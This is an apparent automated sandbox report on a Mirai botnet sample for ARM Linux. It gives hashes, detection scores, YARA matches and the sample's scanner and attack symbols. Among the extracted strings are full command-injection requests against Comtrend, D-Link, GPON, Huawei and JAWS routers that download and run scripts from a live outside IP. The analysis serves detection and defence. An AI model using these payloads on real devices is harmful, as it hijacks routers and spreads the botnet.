Linux Analysis Report
STa4J3TGC8

Overview

General Information

Sample Name:	STa4J3TGC8
Analysis ID:	679616
MD5:	629225375f0931a57b3b0af8790de2e7
SHA1:	57e654779dd2c24b84a974fbf9d43e24168b32cb
SHA256:	965641bf2015ff5ead1b627e962a5f9e0c0d72f786198276e51b89fa6fd00831
Tags:	32armelfmirai
Infos:

Detection

Mirai

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Mirai

Multi AV Scanner detection for submitted file

Contains symbols with names commonly found in malware

Yara signature match

Sample contains strings that are potentially command strings

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Sample and/or dropped files contains symbols with suspicious names

Sample listens on a socket

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: STa4J3TGC8

Avira: detected

Multi AV Scanner detection for submitted file

Source: STa4J3TGC8	Virustotal: Detection: 59%	Perma Link
Source: STa4J3TGC8	Metadefender: Detection: 34%	Perma Link
Source: STa4J3TGC8	ReversingLabs: Detection: 62%

Sample listens on a socket

Source: /tmp/STa4J3TGC8 (PID: 6233)

Socket: 127.0.0.1::44455

Jump to behavior

Source: STa4J3TGC8	String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: STa4J3TGC8	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: STa4J3TGC8	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: STa4J3TGC8	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: STa4J3TGC8	String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: STa4J3TGC8	String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: STa4J3TGC8	String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: STa4J3TGC8	String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: STa4J3TGC8	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: STa4J3TGC8	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: STa4J3TGC8	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Contains symbols with names commonly found in malware

Source: ELF static info symbol of initial sample	Name: attack.c
Source: ELF static info symbol of initial sample	Name: attack_app_http
Source: ELF static info symbol of initial sample	Name: attack_get_opt_int
Source: ELF static info symbol of initial sample	Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample	Name: attack_get_opt_str
Source: ELF static info symbol of initial sample	Name: attack_init
Source: ELF static info symbol of initial sample	Name: attack_method.c
Source: ELF static info symbol of initial sample	Name: attack_method_std
Source: ELF static info symbol of initial sample	Name: attack_method_tcp
Source: ELF static info symbol of initial sample	Name: attack_method_tcpfrag

Yara signature match

Source: STa4J3TGC8, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: STa4J3TGC8, type: SAMPLE	Matched rule: MAL_ARM_LNX_Mirai_Mar13_2022 date = 2022-03-16, hash1 = 0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68, author = Mehmet Ali Kerimoglu a.k.a. CYB3RMX, description = Detects new ARM Mirai variant
Source: 6233.1.00007f3d50042000.00007f3d50047000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6236.1.00007f3d50042000.00007f3d50047000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6236.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6233.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample	Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+;sh+Jaws.sh HTTP/1.1
Source: Initial sample	Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample	Potential command found: GET /index.php?s=/index/hink

Sample and/or dropped files contains symbols with suspicious names

Source: STa4J3TGC8	ELF static info symbol of initial sample: __gnu_unwind_execute
Source: STa4J3TGC8	ELF static info symbol of initial sample: asus_scanner_init
Source: STa4J3TGC8	ELF static info symbol of initial sample: asus_scanner_pid
Source: STa4J3TGC8	ELF static info symbol of initial sample: asus_scanner_rawpkt
Source: STa4J3TGC8	ELF static info symbol of initial sample: comtrend_scanner
Source: STa4J3TGC8	ELF static info symbol of initial sample: comtrend_scanner_pid
Source: STa4J3TGC8	ELF static info symbol of initial sample: comtrend_scanner_rawpkt
Source: STa4J3TGC8	ELF static info symbol of initial sample: dlink_scanner.c
Source: STa4J3TGC8	ELF static info symbol of initial sample: dlinkscanner_fake_time
Source: STa4J3TGC8	ELF static info symbol of initial sample: dlinkscanner_rsck
Source: STa4J3TGC8	ELF static info symbol of initial sample: dlinkscanner_scanner_init
Source: STa4J3TGC8	ELF static info symbol of initial sample: dlinkscanner_scanner_pid
Source: STa4J3TGC8	ELF static info symbol of initial sample: dlinkscanner_scanner_rawpkt
Source: STa4J3TGC8	ELF static info symbol of initial sample: dlinkscanner_setup_connection
Source: STa4J3TGC8	ELF static info symbol of initial sample: gpon443_scanner
Source: STa4J3TGC8	ELF static info symbol of initial sample: gpon443_scanner_pid
Source: STa4J3TGC8	ELF static info symbol of initial sample: gpon443_scanner_rawpkt
Source: STa4J3TGC8	ELF static info symbol of initial sample: gpon80_scanner
Source: STa4J3TGC8	ELF static info symbol of initial sample: gpon80_scanner.c
Source: STa4J3TGC8	ELF static info symbol of initial sample: gpon80_scanner_pid
Source: STa4J3TGC8	ELF static info symbol of initial sample: gpon80_scanner_rawpkt
Source: STa4J3TGC8	ELF static info symbol of initial sample: hnap_scanner.c
Source: STa4J3TGC8	ELF static info symbol of initial sample: hnapscanner_fake_time
Source: STa4J3TGC8	ELF static info symbol of initial sample: hnapscanner_rsck
Source: STa4J3TGC8	ELF static info symbol of initial sample: hnapscanner_scanner_init
Source: STa4J3TGC8	ELF static info symbol of initial sample: hnapscanner_scanner_pid
Source: STa4J3TGC8	ELF static info symbol of initial sample: hnapscanner_scanner_rawpkt
Source: STa4J3TGC8	ELF static info symbol of initial sample: hnapscanner_setup_connection
Source: STa4J3TGC8	ELF static info symbol of initial sample: huawei_scanner_pid
Source: STa4J3TGC8	ELF static info symbol of initial sample: huawei_scanner_rawpkt

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0

Source: classification engine

Classification label: mal68.troj.lin@0/0@0/0

Reads system information from the proc file system

Source: /tmp/STa4J3TGC8 (PID: 6237)

Reads from proc file: /proc/stat

Jump to behavior

Enumerates processes within the "proc" file system

Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1582/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2033/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2275/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/3088/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6191/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6192/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1612/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1579/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1699/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1335/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1698/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2028/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1334/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1576/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2302/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/3236/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2025/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2146/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/910/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/912/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/517/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/759/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2307/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/918/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6241/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6242/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6244/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/4464/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/4465/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6246/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1594/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2285/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2281/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1349/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1623/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/761/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1622/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/884/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1983/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2038/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1344/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1465/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1586/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1463/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2156/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/800/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/801/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6237/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1629/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1627/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1900/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6251/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6254/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6256/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6255/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6258/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6257/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/3021/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/491/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2294/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2050/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1877/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/772/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1633/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1599/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1632/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/774/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1477/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/654/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/896/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1476/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1872/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2048/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/655/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1475/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2289/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/656/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/777/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/657/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/4466/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6249/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/658/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/4467/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/4500/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6248/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/419/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/936/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1639/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1638/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2208/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2180/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6267/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/6266/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1809/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1494/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1890/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2063/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/2062/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1888/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1886/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/420/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1489/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/785/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/1642/exe	Jump to behavior
Source: /tmp/STa4J3TGC8 (PID: 6235)	File opened: /proc/788/exe	Jump to behavior

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/STa4J3TGC8 (PID: 6233)

Queries kernel information via 'uname':

Jump to behavior

Source: STa4J3TGC8, 6233.1.000055f238674000.000055f2387c6000.rw-.sdmp, STa4J3TGC8, 6236.1.000055f238674000.000055f2387a2000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: STa4J3TGC8, 6233.1.00007ffdb51ad000.00007ffdb51ce000.rw-.sdmp, STa4J3TGC8, 6236.1.00007ffdb51ad000.00007ffdb51ce000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/STa4J3TGC8SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/STa4J3TGC8
Source: STa4J3TGC8, 6233.1.000055f238674000.000055f2387c6000.rw-.sdmp, STa4J3TGC8, 6236.1.000055f238674000.000055f2387a2000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: STa4J3TGC8, 6233.1.00007ffdb51ad000.00007ffdb51ce000.rw-.sdmp, STa4J3TGC8, 6236.1.00007ffdb51ad000.00007ffdb51ce000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: STa4J3TGC8, type: SAMPLE
Source: Yara match	File source: 6236.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6233.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: STa4J3TGC8, type: SAMPLE
Source: Yara match	File source: 6236.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6233.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY

Screenshots

No Screenshots

Network Map

⊘No contacted IP infos

ID:	679616
Product:	CloudBasic
Start time:	06:29:08
Start date:	06.08.2022
Sample:	STa4J3TGC8
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	629225375f0931a57b3b0af8790de2e7
SHA1:	57e654779dd2c24b84a974fbf9d43e24168b32cb
SHA256:	965641bf2015ff5ead1b627e962a5f9e0c0d72f786198276e51b89fa6fd00831
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Linux Analysis Report
STa4J3TGC8

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Linux Analysis Report STa4J3TGC8

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Linux Analysis Report
STa4J3TGC8